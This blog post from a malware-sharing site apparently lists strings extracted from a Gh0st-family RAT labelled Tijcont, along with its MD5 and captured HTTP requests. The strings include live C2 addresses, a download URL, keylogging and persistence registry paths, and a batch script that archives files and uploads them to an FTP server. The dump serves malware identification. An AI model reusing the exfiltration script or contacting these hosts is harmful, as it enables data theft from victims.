About contagio exchange

CONTAGIO EXCHANGE Contagio exchange was created to absorb malware samples shared by readers of Contagio. This is meant to be a community driven malware collection.
Edit Aug 2013 - The community is busy and Mila too so this was not a very active site (my fault probably) so I will be just dumping malware strings here - it often helps in malware identification and googling is the best way.
With just strings, not exactly a fun blog to read but might become s useful resource over time.
I will not be posting samples here, just md5. You can find the corresponding samples on contagio or ping me if you can't find
M
P.S. Robot pictures delivered by Robohash.com (generated from file hashes)

Sunday, September 8, 2013

Tijcont strings - CRIME

File: Tijcont
MD5:  845b0945d5fe0e0aaa16234dc21484e0
Size: 475152





GET /3.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: 110.34.198.123:888
Connection: Keep-Alive

GET /s/blog_b2afd7fe01019tkf.html HTTP/1.1
User-Agent: getURLDown
Host: blog.sina.com.cn

GET /album/w=1600;q=90/sign=862e65d610dfa9ecfd2e521152e0cc72/9358d109b3de9c82a5a5fe456d81800a18d84333.jpg HTTP/1.1
User-Agent: loadMM
Host: e.hiphotos.bdimg.com

Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
?zRich
.text
`.rdata
@.rsrc
hG @
hq @
hc @
hG @
%< @
%8 @
%  @
%$ @
%( @
%0 @
c:\windows\temp\temp%d.exe
wsprintfA
MessageBoxA
user32.dll
CloseHandle
CreateFileA
ExitProcess
GetFileSize
GetModuleFileNameA
GetSystemInfo
ReadFile
SetFilePointer
VirtualAlloc
VirtualFree
WriteFile
kernel32.dll
ShellExecuteA
shell32.dll
!This program cannot be run in DOS mode.
RichM
.text
`.rdata
@.data
.rsrc
WPQj
SUVWj
T$(j
@h`0@
-d @
h\0@
IQRV
D$0k
-T @
L$Tf
T$hjfR
D$pP
SSSSj
L$8Qj
T$TR
=l @
hp0@
D$TP
_^]3
hSVW
>"u:F
XPVSS
CloseHandle
FreeResource
Sleep
WriteFile
CreateFileA
DeleteFileA
SizeofResource
LockResource
LoadResource
FindResourceA
GetModuleFileNameA
WaitForSingleObject
CreateEventA
GetProcAddress
LoadLibraryA
GetWindowsDirectoryA
GetTickCount
KERNEL32.dll
RegisterClassA
LoadCursorA
LoadIconA
USER32.dll
GetStockObject
GDI32.dll
RegCloseKey
RegSetValueExA
RegOpenKeyA
RegCreateKeyExA
StartServiceA
ControlService
ChangeServiceConfigA
OpenServiceA
OpenSCManagerA
ADVAPI32.dll
sprintf
rand
srand
MSVCRT.dll
_exit
_XcptFilter
exit
_acmdln
__getmainargs
_initterm
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
__set_app_type
_except_handler3
_controlfp
GetModuleHandleA
GetStartupInfoA
DLLPath
SYSTEM\CurrentControlSet\Services\RemoteAccess\RouterManagers\Ip
c:\NT_Path.jpg
Glable__Wait
Advapi32.dll
CloseServiceHandle
RemoteAccess
%s%d.dll
My Win32
Bome
!This program cannot be run in DOS mode.
U1Rich,
.text
`.rdata
@.data
.rsrc
@.reloc
Wh `
SSSS
SSSS
j PQ
F@j RP
_^][
_^]2
_^]2
GD_^][
SUVWh(a
_^]2
{@Rh
_^]2
CE][Y
SUVWh
_^]3
D$ y
[_^]
[_^]
^][Y
QSUV
.PQV
^][Y
SUVW
_^]3
_^]3
_^]3
_^]d
 SUVW
_^]2
_^]2
L$ j
_^]2
uLj0
_^][
_^][
t$$P
_^][
L$(j
D$,P
L$(QU
_^][
t$ W
D$$@
D$$|
_^][
t$ f
t-f=e
t'f=
WWRh
Sh@8
Sh@8
|$$3
L$ f
D$$P
D$ 3
D$ j
;|$ r
_^]3
T$(f
T$,f
L$(Q
T$$j0
L$ j
;|$ r
][_3
T$(h
T$(h
_^]3
|$$3
L$ f
D$(P
L$ j0
_^]3
_^][
L$ f
t}j0
_^]3
L$<j
T$8j
T$Qf
D$(E
T$)f
D$.@
D$ Pf
T$Th
D$DPf
D$&f
|$xf
T$|j
|$|f
T$dj
j(PQ
]_^3
SUVW
_^][d
HGPW
?\uK
8\uC
tY<\uG
L$,h
|$8h
L$<QVVVVVU
L$8GQ
<AtG<BtC
T$ j
|$0W
_^][
D$ %
D$!s
D$"\
D$$.
_^][
jBWS
L$T$
L$(QR
L$$US
_^][
D$ .
_^]2
|$D.tL
L$DQV
^_][
^_][
\u!V
D$,W
D$(u
|$\.
D$\PWVh
L$ U
D$ ;
T$0RP
L$,Q
_^]d
_^jk
_^][
_^][
{ PW
T$$j
_^][
_^][
_^][d
L$0Ph
L$0Q
L$0Ph
L$0Q
t$`W
QRPPPPPPVP
D$L(c
t$`W
QRPPPPPPVP
|$`j/W
D$@D
D$H(c
D$$o
D$%p
D$&e
D$'n
_^][
Ph`Q
Ph@R
Ph S
Ph W
HFPVj
Vh f
L$8SQ
t"j0
D$8SP
_^][
_^][
SUVWj
PWVS
_^][Y
T$ h
L$ Q
D$"Q
l$4SQ
T$$VU
D$$[
D$<_^][
< uX
;!u'
(SVW3
QSSSSSSSSj
QSUV
_^][Y
T$$h
tiWS
PWVS
.RPS
_^][
SSSUh
_^][
_^][
_^][
_^][
_^][
_^][
L$@h
T$@h
T$@3
D$DRP
D$TSUVW
_^][d
_^][
QSUVW
_^][Y
_^][d
tfjdj
t5jdj
QSVW
IGQW
JGRW
_^][
QSUVW
_^][Y
_^][
QUVWh$e
t4j0
wQt1-
_][^
t\SV
t6WS
SUWV
_][^
DSUV
n0hTe
F,PQR
NDPQ
FDQj
FLRP
VHQR
F(RPj
^][d
QSUV
_^][d
\$(UVW3
D$$P
NxRPQ
~0;~,}
_^][
_^]3
SUVWh
N(Uj
^4Uj
_^]2
QSVW
_^[Y
NLRj
SUVW
VPQR
FDQRPUSQ
NLRQ
NLh
RPQUSj
T$@j
_^][
SUVh
\$ 3
D$ Q
RWPVj
T$4j
_^][Y
:;9t_
SUVW
L$(3
L$$j
T$$j
L$8Q
D$@D
D$|h
T$8QRj
u'j0
^][d
QSUV
_^][d
PSUQ
^_][
SUVWh8f
D$$h
PQVR
D$$h
$t&Ht
HAPQ
_^[Y
UVW3
D$0(
D$(PQ
T$,j0
T$0j0
L$LQ
jBVS
t$LA
L$(QR
jBWS
(VWj0
7jBQU
(_^]
T$,Vj
D$ Q
L$ Rh`
SUVW
SUVW3
UUUUh
l$ u
_^]2
_^]2
L$(Ph
|$(MZu'
T$$SR
L$0PQR
L$ Q
SSSS
SSSSSSSSh
L$@jdQV
,SUVW
_^][
_^]2
_^]2
RSh,
Pj,h-
_^]2
Rj,h
QPPVhp
_^][
Fxh@g
_^][
F,_^[
L$ d
l$0t
L$ d
D$ M263
D$$IV32
D$(MP42
D$,cvid
vidc
Qhvidc
FDtX
Vxhlg
FLPQh
NDhTg
NHQU
NLPQh
^[_]d
FxSW
SUVWh
L$LjdQV
D$tW3
D$xf
QRSVSSf
Shpc
T$ QRSh
L$(R
L$df
D$4
SUVWh
_^][
_^][
_^][
SUVW
PhPn
_^]3
D$$Q
D$,f
D$0tn
WPjfP
t$8h
WWWh
WWWh
ItJU
\u+V
]_^[
,SVW3
VWh?
SUVW
T$$QR
D$|P
PQSh?
SSSRh
D$|P
_^][
SUVW
T$ h
L$(PQ
_^][
_^][
_^@[
SUVW
L$$j
|$TR
_^][
_^]3
\$.f
\$6f
T$ f
|$"f
L$$f
D$&f
|$(f
T$*f
t$,f
D$0f
|$2f
t$4f
L$8f
D$:f
|$<f
T$>f
L$@f
L$Bf
L$Ff
D$Hf
|$Jf
T$Lf
L$Nf
L$Pf
t$Rf
D$Tf
D$Vf
L$Xf
D$Zf
L$\f
T$^f
t$`f
D$bf
D$df
L$ff
D$hf
L$jf
T$lf
T$nf
L$pf
D$rf
T$tf
t$vf
D$xf
\$zf
D$|f
|$~f
SUV3
_^]3
T$<VW
D$DS
\$DV
N(PQ
~(9~$u
_^][
_^][
_^][
_^][
|$08
W(9W$u
\$ ;
D$(;
_^][
_^][
tZ9H tU9H$tP
n ux
_^]3
F|UV
_^]3
_^]3
_^]3
V(PR
N(PQ
V(QR
B<Wf
_^][
U0SQR
Fdf+Fh
Nlw^
~@B3
SUVW
T$ v
D$(8D*
D$ ;
_^][
QSUV
nXtX
f+F\
VlH3
NlBI
FlAH
^][Y
_^]3
G(RP
G0_^
W(VR
G(Sj
W(QR
G(VP
D$8S
\$8U
C0V;
L$Ds
D$$R
L$,P
T$4Q
D$<RP
D$<Q
L$DR
T$LPQR
 s,3
T$D;
T$Ds
|$HPWS
T$Ds
D$ u"
T$Ds
L$ +
t$Hj
N(PQ
D$4s
L$ ;
L$DRQ
L$0R
T$(PQR
N(PQ
T$DPVS
L$Ds
L$LQP
_^][
_^][
_^][
_^][
D$HQ
_^][
_^][
T$LRWS
_^][
L$D+
T$LRP
_^][
_^][
L$L+
_^][
F(RP
_^][
L$LQV
_^][
F(RP
_^][
V(QR
T$HVS
_^][
_^][
L$LQVS
K4PVS
_^][
_^][
_^][
L$H+
_^][
N(PQ
F(RP
N(WQ
|$ WUSV
@APQV
_^][
D$$f
T$ RV
_^][
_^][
D$$SUV
L$03
t$ f
D$0tb
D$0H
_^][
]_^[Y
HPQV
JRPV
_^][
T$ }
]_^[
l$ 3
l$ f
l$ f
l$ f
t$ W
WVQR3
D$,s
D$(3
L$$r
D$$#
D$(3
L$$r
D$$#
D$(3
L$$r
D$$#
D$(3
L$$r
D$$#
T$,RWV
;N,u
T$,RWV
T$,RWV
_^][
_^][
L$,QWV
_^][
T$,RWV
_^][
_^][
_^][
_^][
|$ j
L$ RUPj
W(SR
^]_[Y
W(SR
^]_[Y
9t$Tu
:_^]3
T$,v
T+3x%A
t$Dy
t$DB
L$,;
T$,+
L$H;
D$1+
T$0+
;D$<s!
;D$<r
|$8M#
L$,B;
t$D3
\$,UV
C(Wj
L$4R
T$,PQh
L$8R
T$(P
D$0Qh
C(WP
_^][Y
K(WQ
_^][Y
K(WQ
_^][Y
K(WQ
_^][Y
S(WR
_^][Y
S(WR
_^][Y
K<UWQ
K<UVQ
L$(SU
t$0#
t$4#
L$,+
l$(+
l$(+
GFMu
GFIu
GFIu
GFIu
\$8+
{4_^]3
\$8+
{4_^]
\$8+
{4_^]
NWVS
u7WPS
u&WVS
_^[]
 deflate 1.1.4 Copyright 1995-2002 Jean-loup Gailly
 inflate 1.1.4 Copyright 1995-2002 Mark Adler
CreateEventA
LoadLibraryA
FreeLibrary
CloseHandle
TerminateThread
Sleep
GetProcAddress
WaitForSingleObject
SetEvent
ResumeThread
CreateThread
DeleteCriticalSection
VirtualFree
LeaveCriticalSection
EnterCriticalSection
VirtualAlloc
GetLastError
ResetEvent
InterlockedExchange
CancelIo
GetTickCount
GetLocalTime
GetCurrentProcessId
HeapAlloc
GetProcessHeap
DeleteFileA
CreateDirectoryA
GetFileAttributesA
lstrcpyA
lstrlenA
GetDriveTypeA
GetDiskFreeSpaceExA
GetVolumeInformationA
GetLogicalDriveStringsA
FindClose
LocalFree
FindNextFileA
LocalReAlloc
FindFirstFileA
LocalAlloc
RemoveDirectoryA
GetFileSize
CreateFileA
ReadFile
SetFilePointer
WriteFile
MoveFileA
lstrcatA
GetSystemDirectoryA
CreateProcessA
ExitProcess
Process32Next
lstrcmpiA
Process32First
CreateToolhelp32Snapshot
HeapFree
MapViewOfFile
CreateFileMappingA
UnmapViewOfFile
GetModuleHandleA
GlobalFree
GlobalUnlock
GlobalLock
GlobalAlloc
GlobalSize
GetStartupInfoA
WaitForMultipleObjects
LocalSize
TerminateProcess
OpenProcess
GetCurrentThreadId
GlobalMemoryStatus
GetSystemInfo
GetComputerNameA
GetVersionExA
OpenEventA
SetErrorMode
GetCurrentProcess
GetWindowsDirectoryA
SetFileAttributesA
CopyFileA
ExpandEnvironmentStringsA
GetModuleFileNameA
KERNEL32.dll
DispatchMessageA
TranslateMessage
GetMessageA
CharNextA
wsprintfA
GetWindowTextA
MessageBoxA
LoadCursorA
BlockInput
SendMessageA
keybd_event
MapVirtualKeyA
SetCapture
WindowFromPoint
SetCursorPos
mouse_event
CloseClipboard
SetClipboardData
EmptyClipboard
OpenClipboard
GetClipboardData
GetSystemMetrics
SetRect
GetDC
GetDesktopWindow
ReleaseDC
DestroyCursor
GetCursorInfo
GetCursorPos
ExitWindowsEx
GetWindowThreadProcessId
IsWindowVisible
CloseDesktop
SetThreadDesktop
OpenInputDesktop
GetUserObjectInformationA
GetThreadDesktop
OpenDesktopA
PostMessageA
IsWindow
CloseWindow
CreateWindowExA
LoadMenuA
RegisterClassA
LoadIconA
USER32.dll
GetStockObject
GDI32.dll
RegCloseKey
RegQueryValueExA
RegOpenKeyExA
CloseEventLog
ClearEventLogA
OpenEventLogA
RegSetValueExA
RegCreateKeyExA
CloseServiceHandle
DeleteService
OpenServiceA
OpenSCManagerA
FreeSid
SetSecurityDescriptorDacl
AddAccessAllowedAce
InitializeAcl
GetLengthSid
AllocateAndInitializeSid
InitializeSecurityDescriptor
RegOpenKeyA
SetServiceStatus
RegisterServiceCtrlHandlerA
UnlockServiceDatabase
ChangeServiceConfig2A
LockServiceDatabase
CreateServiceA
StartServiceA
AdjustTokenPrivileges
LookupPrivilegeValueA
OpenProcessToken
RegSaveKeyA
RegRestoreKeyA
RegDeleteKeyA
ADVAPI32.dll
SHGetSpecialFolderPathA
SHELL32.dll
??2@YAPAXI@Z
??3@YAXPAX@Z
puts
__CxxFrameHandler
memmove
putchar
ceil
_ftol
strstr
_CxxThrowException
rand
sprintf
strncpy
free
malloc
_except_handler3
strrchr
_beginthreadex
atoi
wcstombs
_access
srand
calloc
MSVCRT.dll
??1type_info@@UAE@XZ
_initterm
_adjust_fdiv
WSAIoctl
WSASocketA
WS2_32.dll
?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z
?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ
?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z
?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z
?_Refcnt@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEAAEPBD@Z
?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z
?_Split@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ
?_Xran@std@@YAXXZ
?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB
MSVCP60.dll
_strrev
_stricmp
Work.dll
EndWork
Runing
ServiceMain
Working
WINMM.dll
waveOutUnprepareHeader
waveOutClose
waveOutReset
waveInUnprepareHeader
waveInClose
waveInStop
waveInReset
waveOutWrite
waveInStart
waveInAddBuffer
waveInPrepareHeader
waveInOpen
waveInGetNumDevs
waveOutPrepareHeader
waveOutOpen
waveOutGetNumDevs
InitializeCriticalSection
kernel32.dll
WS2_32.DLL
connect
.PAX
.PAD
bad Allocate
bad buffer
2008
2003
2000
ProductName
SOFTWARE\Microsoft\Windows NT\CurrentVersion
%s%d%s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E)
InternetOpenUrlA
InternetOpenA
InternetCloseHandle
WININET.dll
%d.%d.%d.%d
ShellExecuteA
Shell32.dll
SHGetFileInfoA
%s\%s
%s%s%s
%s%s*.*
\syslog.dat
WinSta0\Default
Gh0st Update
System
Security
Application
NetSubKey
EnumWindows
user32.dll
IMM32.dll
[%02u-%02u-%d %02u:%02u:%02u] (%s)
GetWindowTextA
GetActiveWindow
GetKeyNameTextA
CallNextHookEx
ImmReleaseContext
ImmGetCompositionStringA
ImmGetContext
MyCreateMa
SetWindowsHookExA
UnhookWindowsHookEx
\Plugin
PluginEnd
PluginStart
PluginDelete
%s   %s   %s
PluginDescript
%s\*.*
DestroyCursor
User32.dll
SystemParametersInfoA
USER32.dll
SelectObject
CreateDIBSection
CreateCompatibleDC
GDI32.dll
DeleteObject
DeleteDC
BitBlt
GetDIBits
CreateCompatibleBitmap
CreateProcessA
\cmd.exe
CreatePipe
Kernel32.dll
CloseHandle
DisconnectNamedPipe
TerminateProcess
TerminateThread
PeekNamedPipe
GetModuleFileNameExA
EnumProcessModules
PSAPI.dll
SeDebugPrivilege
SeShutdownPrivilege
InternetReadFile
Mozilla/4.0 (compatible)
CVideoCap
capCreateCaptureWindowA
AVICAP32.dll
#32770
CreateWindowExA
capGetDriverDescriptionA
ICSeqCompressFrame
ICSeqCompressFrameStart
ICSendMessage
ICOpen
MSVFW32.dll
ICClose
ICCompressorFree
ICSeqCompressFrameEnd
tur&b`ohpcvo/akn
kwur9*-qus/achfs,`lo.hs(vyv
13321=07^e`ohpcvo
Qrf[sb
Wmhnvf"Uqkbg`vwm"Gddm",QQB!!Qaqwhfg
"SRB"
 QzqqmhSmlv _Wxqpfh;0XWxbQr`/q{e
~MHz
HARDWARE\DESCRIPTION\System\CentralProcessor\0
Global\Net_%d
My Win32 Applaction
WIN32 Application
SeBackupPrivilege
SeRestorePrivilege
ServiceDll
%s\Parameters
SOFTWARE\%d
Net-Temp.ini
SYSTEM\CurrentControlSet\Services\
imgsvc
SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost
\Parameters
%SystemRoot%\System32\svchost.exe -k imgsvc
Glable__Wait
c:\NT_Path.jpg
1.1.4
need dictionary
incorrect data check
incorrect header check
invalid window size
unknown compression method
invalid bit length repeat
too many length or distance symbols
invalid stored block lengths
invalid block type
incompatible version
buffer error
insufficient memory
data error
stream error
file error
stream end
invalid distance code
invalid literal/length code
incomplete dynamic bit lengths tree
oversubscribed dynamic bit lengths tree
incomplete literal/length tree
oversubscribed literal/length tree
empty distance tree with lengths
incomplete distance tree
oversubscribed distance tree
.?AVtype_info@@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.34</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>
1#1+141A1I1Q1a1i1q1
3Z3`3g3
4'4Y4^4
5;5A5F5o5t5
5F6Q6b6
6C7_7e7z7
7C819F9g9m9|9
:!:U:z:
:$;.;
<)<X<`<
<+=?=z=
> >&>;>
?8?F?T?e?p?
0-0?0]0t0
0>1Q1
4*5>5T5h5|5
5K7X7^7v7
768B8|8
9=9B9_9
:$:*:3:F:Y:
;!;9;[;|;
<$=N=o=
>A>T>x>
>&?4?8?<?@?D?H?L?P?T?X?\?
"070=0[0l0
041=1
2C2I2h2
3"3,3I3Z3f3l3
4#4,4M4Z4m4r4y4
5/5T5
607|7
949j9
9 :[:`;h;{;
;3<T<
<K=a=i=(>,>0>4>8><>@>D>H>L>P>T>X>\>f>k>
?8?L?a?n?
2!2[2
2:3D3K3
3&4B4M4
4'535>5E5
7/7_7
8,989F9P9^9w9
:f;w;
;B<k<
<[=s=
0*020Y0i0u0
1C2e2o2#3E3O3
4%4/4
7#7E7O7
8%8/8
9R:~:
:!;';.;5;h;
<5<J<Q<p<w<
<'=.===^=x=
>D>r>
?$?/?
1"141Y1_1t1x1|1
122;2B2M2j2
4+4u4
4F5R5_5k5p5z5
5,63696>6F6r6w6
7 747:7Y7t7
8$8W8^8
9q9x9
:#:,:3:8:>:C:L:Q:\:a:m:v:
;#;@;
<$<5<A<L<q<
='=.=5=O=a=h=o=
>.><>M>T>g>}>
?N?]?d?i?n?
0#00080B0Q0V0]0c0s0
1M1V1]1x1
2 2U2\2
3#3R3Z3_3p3u3
324[4t4
6)6j6
6+7R7^7e7s7
888D8L8h8
:*:1:?:F:U:{:
>!>Y>u>
L03181<1@1D1H1L1P1T1X1\1`1d1h1l1
3E3K3R3]3n3}3
5X5b5v5
5X6\6`6d6h6l6p6
7'717a7g7
9!959K9t9|9
:U:Z:
:3;R;k;q;w;|;
< <B<
>)>R>[>d>
0,020:0J0O0j0p0u01171@1
2p2u2|2
2,323?3R3Z3c3
5!545O5
6!6V6^6e6
6S7r7x7
82878q8x8
909r9
:":':c:
:B;R;r;
;1<C<
=)>X>]>r>
?B?e?{?
0!0(0;0f0
1&1.1@1K1t1{1
2:2A2b2v2
273d3
5 5-54595N5S5\5k5t5
686a6g6l6
8Q8Z8~8
8 :3:c:o:
:#;>;M;d;h;l;p;v<}<
=+=J=r=|=
>)?/?5?d?
0f1q1
2.3[3
4:4M4
5"5I5j5p5u5{5
6 6>6D6_6s6x6
7$8X8k8}8
9#9+90969@9W9_9j9r9|9
:<:C:i:n:u:|:
:G;U;\;c;
<"<F<`<k<
>4?9?
Q0`0
1^1e1p1v1
2;2d2
3D3c3
5<5I5O5d5
;(;.;3;N;Z;a;k;y;
;=<C<
<7=g=
5 5$5(5,5v5
557F8
9=9w9|:5<A<P<_<
={>*?
2e3T4`6d6h6l6p6t6x6|6
8a:o:
;E=J=
-0<0_4k5_6
;G<g<
1<2[2z2
7"8(8.8B8
9$9/9<9F9[9g9m9
: :&:9:Y:|:
;4;T;e;j;
<7<W<w<
</=T=
>9>Q>i>
4 4$4(4p4|4
t1x1
2 2<2H2d2l2t2
3 3(3X3l3x3
4(4D4P4l4t4
5,545@5\5d5p5
606D6P6l6x6
7 7P7d7p7x7
848@8\8h8
9,989T9\9
081<1P1T1l1
9999999
y999
y99w
s:/::@s
         C CTz
0      CCCCCCCCCCTz
       C CCCCCCCICIJQz
p     ((+))(+++.C.IIJJJJW
/
!#*,,HJJJJJP
   9
$*HHKKPRS
!*2JPSSSx
@
'HPSSk
B  t
"4PZ\x
"6Wjl
   BAAABC adw
:    AAACCEE.CCEP
B   AAACCCCAEEEEEJJh
  B AB +B+++...E.H.IM
    ))!
!##$**$$
:  +
`[jkl
mVRYY[jkx
!CJJJJJIKKKYRRRRSS\jk
5  T
*.JJJKKKKKKKRRYYS\jk
  CC
*.JJJKKKKKRRRRYS\jl
 C CF
$12HHKKKRRRRYS\j
p  CACO
%$11122424[\j
/ AACACF
71V\l
 CCCACCAEv
/CAACCCAIAI
CACACCEEIIIIS
3V\l
LCCCCEEEIAJFJJJSl
pOEEEIIIJJJJJJRRRRSYRS[YY[[\
waIIJJJJRJRRRRRRYXXXXS\l
dJJRJRJRRRRRXXXX[[
tSRRRRRXXXX[[\
wZRRXXX[[
}5<<<V7x
<<<<<<AADDKt
%%'''',,CKMf
(.KN\
01OSe
0R`a
/<Gb<<ggv
<<<<+,,?ACCb
<<,$
hOY``l
 1KKUOYYYY_`
 11.KIOOS`
<<AX
o<<A<K
8<AADDD\
VA<DDJJJKe
pRJDMMMOOYYYYY___
}eMNNUNUUU___
lYUU___^
#&&&&&******&
*********
(*****
****
'***%
!! !    !!!!#
OLEE
-+'e
a]Ud
gc\_
jf_a
a]V]
))'4
a]Va
lkiU
c_Xd
eaZf
~}{b
gc[g
ZWSE
~~~&
jf]s
/-)s
ZWOQ
.,(-
443/
3220
31-1
>>=2
<:6J
VVU4
bba.
www.
___$
yyy3
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.34</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>
!This program cannot be run in DOS mode.
MHIz
Y{jN'
lq}_'X
---------------------snip---------------------snip---------------------snip
h`]A
hP^A
h8_A
__GLOBAL_HEAP_SELECTED
__MSVCRT_HEAP_SELECT
runtime error
TLOSS error
SING error
DOMAIN error
R6028
- unable to initialize heap
R6027
- not enough space for lowio initialization
R6026
- not enough space for stdio initialization
R6025
- pure virtual function call
R6024
- not enough space for _onexit/atexit table
R6019
- unable to open console device
R6018
- unexpected heap error
R6017
- unexpected multithread lock error
R6016
- not enough space for thread data
abnormal program termination
R6009
- not enough space for environment
R6008
- not enough space for arguments
R6002
- floating point not loaded
Microsoft Visual C++ Runtime Library
Runtime Error!
Program:
<program name unknown>
SunMonTueWedThuFriSat
JanFebMarAprMayJunJulAugSepOctNovDec
GetLastActivePopup
GetActiveWindow
MessageBoxA
user32.dll
string too long
invalid string position
ios::eofbit set
ios::failbit set
ios::badbit set
Unknown exception
HeapAlloc
GetProcAddress
LoadLibraryA
lstrcatA
lstrlenA
CloseHandle
ReleaseMutex
GetLastError
OpenMutexA
GetTempPathA
WinExec
DeleteFileA
Sleep
FreeLibrary
WriteFile
lstrcpyA
CreateFileA
WaitForSingleObject
CreateThread
GetWindowsDirectoryA
GetCurrentProcess
CreateMutexA
ExitProcess
CopyFileA
GetModuleFileNameA
GetSystemDirectoryA
KERNEL32.dll
wsprintfA
USER32.dll
RegCloseKey
RegOpenKeyExA
RegEnumValueA
RegEnumKeyExA
RegQueryValueExA
RegSetValueExA
RegCreateKeyA
RegOpenKeyA
AdjustTokenPrivileges
LookupPrivilegeValueA
OpenProcessToken
ADVAPI32.dll
WSAIoctl
WS2_32.dll
URLDownloadToFileA
urlmon.dll
PathRemoveFileSpecA
SHLWAPI.dll
RtlUnwind
TerminateProcess
FindFirstFileA
FindNextFileA
FindClose
FileTimeToSystemTime
FileTimeToLocalFileTime
GetModuleHandleA
GetStartupInfoA
GetCommandLineA
GetVersion
HeapReAlloc
HeapSize
HeapFree
UnhandledExceptionFilter
FreeEnvironmentStringsA
FreeEnvironmentStringsW
WideCharToMultiByte
GetEnvironmentStrings
GetEnvironmentStringsW
SetHandleCount
GetStdHandle
GetFileType
GetEnvironmentVariableA
GetVersionExA
HeapDestroy
HeapCreate
VirtualFree
VirtualAlloc
IsBadWritePtr
MultiByteToWideChar
GetStringTypeA
GetStringTypeW
GetTimeZoneInformation
SetUnhandledExceptionFilter
IsBadReadPtr
IsBadCodePtr
GetCPInfo
GetACP
GetOEMCP
LCMapStringA
LCMapStringW
CompareStringA
CompareStringW
SetEnvironmentVariableA
RaiseException
SetFilePointer
FlushFileBuffers
ReadFile
SetStdHandle
REG_BINARY
%-24s %-15s
REG_MULTI_SZ
%-24s %-15s 0x%x(%d)
REG_DWORD
%-24s %-15s %s
REG_EXPAND_SZ
REG_SZ
[%s]
siqiao.gnway.net:8888
http://110.34.198.123:888/3.txt
174.139.45.210
xxxxxxxxxxxxx
ftp4aol
Twitter51234
http://siqiao.gnway.net/rar.exe
My_Host_URL
SYSTEM\CurrentControlSet\Services\%s
BITS
SYSTEM\CurrentControlSet\Services\BITS\
URLDownloadToFileA
urlmon.dll
Test.exe
http://ip.3322.net/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E)
InternetReadFile
InternetOpenUrlA
InternetOpenA
InternetCloseHandle
WININET.dll
del %0
del %Update_TmpFile% /q
rd %Update_TmpFile% /q
del %Update_FileName%
rem Xcopy %Update_TmpFile%* C:\Temp /y
del ftp.sman /q
FTP -s:ftp.sman -i
echo bye >>ftp.sman
echo put %Update_FileName% >>ftp.sman
echo %Update_ftpUserPass% >>ftp.sman
echo %Update_ftpUserName% >>ftp.sman
echo open %Update_ftpServer% >>ftp.sman
"rar.exe" a %Update_FileName% %Update_TmpFile% "%Update_File%"
set Update_date=%date:~0,4%%date:~5,2%%date:~8,2%
set Update_ftpUserPass=
set Update_ftpUserName=
set Update_ftpServer=
set Update_FileName=
set Update_TmpFile=C:\~MyTemp\
set Update_File=
\*.*
Update.bat
npki
NPKI
Userinit
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
%s%s%s
\Tasks\csrss.exe
%s%s
\system32\userinit.exe
SeDebugPrivilege
rss.exe
\System32\rar.exe
\Tasks
\drivers\etc\Changer.bat
.?AVios_base@std@@
.?AV?$basic_ios@DU?$char_traits@D@std@@@std@@
.?AV?$basic_istream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ostream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_streambuf@DU?$char_traits@D@std@@@std@@
.?AV?$basic_filebuf@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ios@GU?$char_traits@G@std@@@std@@
.?AV?$basic_istream@GU?$char_traits@G@std@@@std@@
.?AV?$basic_ostream@GU?$char_traits@G@std@@@std@@
.?AV?$basic_filebuf@GU?$char_traits@G@std@@@std@@
.?AV?$basic_streambuf@GU?$char_traits@G@std@@@std@@
.?AVexception@@
.?AVlogic_error@std@@
.?AVlength_error@std@@
.?AVout_of_range@std@@
.?AVruntime_error@std@@
.?AVfailure@ios_base@std@@
.?AVfacet@locale@std@@
.?AV_Locimp@locale@std@@
.?AVtype_info@@
!Win32 .EXE.
2J#R
.MPRESS1
.MPRESS2I
.rsrc
v2.17U
o\BU
OCxc
PZ8P
Q---------------------snip
C}'g
LJ#RBome
LJ#RBome
LJ#RBome
LJ#RBome
LJ#RBome
LJ#RBome
LJ#RBome
LJ#RBome
LJ#RBome
[hQkS
c!jWW
[hQkS
LJ#RBome
LJ#RBome
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
